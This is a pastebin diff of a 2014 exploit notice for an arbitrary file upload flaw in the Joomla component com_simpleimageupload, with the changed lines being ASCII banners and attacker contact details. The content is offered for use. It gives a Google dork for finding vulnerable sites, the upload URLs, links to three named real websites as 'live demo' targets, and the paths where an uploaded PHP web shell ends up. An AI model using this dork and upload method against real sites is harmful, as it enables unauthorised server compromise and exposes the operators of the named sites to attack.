SHOW:
|
|
- or go back to the newest paste.
1 | - | _____ ________.__ __ |
1 | + | ,------. ,--. ,-----. ,--. |
2 | - | / _ \ ____ ____ ____ / _____/| |__ ____ _______/ |_ |
2 | + | | .-. \ ,---. ,--,--. ,-| | ,---. ' .-. ',--.,--.| | |
3 | - | / /_\ \ / \ / _ \ / \/ \ ___| | \ / _ \/ ___/\ __\ |
3 | + | | | \ :| .-. :' ,-. |' .-. |( .-' | | | || || || | |
4 | - | / | \ | ( <_> ) | \ \_\ \ Y ( <_> )___ \ | | |
4 | + | | '--' /\ --.\ '-' |\ `-' |.-' `)' '-' '' '' '| | |
5 | - | \____|__ /___| /\____/|___| /\______ /___| /\____/____ > |__| |
5 | + | `-------' `----' `--`--' `---' `----' `-----' `----' `--' |
6 | - | \/ \/ \/ \/ \/ \/ |
6 | + | dead_s0ul@outlook.com |
7 | - | -------------------------------------------------- |
7 | + | |
8 | - | | https://twitter.com/ungku_nazmi | |
8 | + | |
9 | - | | https://twitter.com/AnonGhostTeam | |
9 | + | |
10 | - | -------------------------------------------------- |
10 | + | |
11 | # Date: 05/11/2014 | |
12 | # Exploit Author: Donnazmi | |
13 | # Tested on: Windows + Linux | |
14 | # Google dork: inurl:/index.php?option=com_simpleimageupload | |
15 | ------------------------------------------------------------------------ | |
16 | ||
17 | # Exploit | |
18 | # -Live HTTP Header- | |
19 | ||
20 | 1) | |
21 | http://localhost/path/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_articletext | |
22 | 2) | |
23 | http://localhost/path/administrator/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_articletext | |
24 | ||
25 | Live Demo : | |
26 | http://www.bonyadtabari.ir/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_articletext | |
27 | http://phurithat.ac.th/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_content | |
28 | http://www.aviatime.com/en/people/administrator/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_articletext | |
29 | ||
30 | # Shell path: | |
31 | http://localhost/path/images/pic/shell.php.jpeg | |
32 | http://localhost/path/images/shell.php.jpeg |